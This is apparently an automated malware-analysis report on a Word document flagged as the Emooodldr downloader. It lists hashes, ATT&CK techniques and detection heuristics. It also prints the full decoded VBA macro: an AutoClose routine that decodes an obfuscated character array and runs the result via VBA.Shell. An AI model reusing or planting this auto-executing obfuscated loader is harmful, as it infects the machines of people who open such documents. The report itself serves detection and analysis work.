Emooodldr Office (OOXML) malware analysis — malicious · f7854d717ea3449b

MALICIOUS

Office (OOXML)

53.9 KB Created: 2017-11-29 23:43:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2018-07-14

MD5: 12d070eb94b43e5ea279f913b1b88888 SHA-1: 8e8ee386d56f308511f69045b9b06160f3cc40f9 SHA-256: f7854d717ea3449b6cf2ed56b8fc1e790dff23df19c62e554f233300faac8750

282 Risk Score

Malware Insights

Emooodldr · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The sample contains VBA macros, specifically an AutoClose macro, which utilizes the Shell() function. This function is used to execute a command that is constructed from a concatenated array of characters, likely to download and execute a second-stage payload. The ClamAV detection name 'Doc.Malware.Emooodldr-6711604-0' strongly suggests the Emooodldr family.

Heuristics 6

ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	2077 bytes
SHA-256: `edfcc89dbe857872a032ed8a7c54ebcecfd65dd6101ad59af9ffd7d96241dfe2`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoClose() gynecology = Array("p", "o", "K", "z", "4", "W", "L", "2", "L", "Q", "K", "z", "z", "h", "1", "0", "0", "E", "v", "s", "F", "E", "C", "v", "m", "Y", "E", "C", "s", "E", "K", "C", "L", "C", "W", "6", "V", "p", "0", "j", "u", "0", "o", "F", "", "2", "W", "h", "K", "h", "P", "m", "z", "p", "4", "8", "v", "V", "Y") corniche = preillustration(gynecology) Application.Run "intricacies", (corniche) End Sub Private Sub intricacies(filminess) meerkat = 6162 delphinidae = True While delphinidae barter = meerkat + 222 If barter - meerkat > 111 Then VBA.Shell filminess, vbNormalFocus - 1 delphinidae = False End If Wend End Sub Public Function unwearied(wodges, simoom) haptenic = 9090 miersiteator = -1 For Each concordantly In simoom If concordantly = wodges Then haptenic = miersiteator Exit For End If miersiteator = miersiteator + 1 Next If haptenic = 9090 Then haptenic = -1 End If unwearied = haptenic + 1 End Function Private Function preillustration(gynecology) reexportation = Array("", "2", "Q", "m", "u", "E", "C", "8", "W", "h", "z", "0", "v", "K", "s", "L", "1", "6", "F", "P", "o", "p", "V", "j", "4", "Y") hiortdahlite = Array("k", "x", " ", "u", "A", "q", "w", "=", ".", "p", "t", "/", "d", "h", "i", "e", ":", "c", "j", "?", "s", "m", "o", "N", "a", "n") purloining = vbNullString For Each jointworm In gynecology indeed = Application.Run("unwearied", jointworm, reexportation) If indeed > -1 And indeed < 8080 Then purloining = hiortdahlite(indeed) + purloining End If Next preillustration = StrReverse(purloining) End Function
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	12288 bytes
SHA-256: `0de9c23f512a5f05d24aca2e59e5f5ac31e565e30d5b467dc36bddc216976a17`
Detection ClamAV: Doc.Malware.Emooodldr-6711604-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.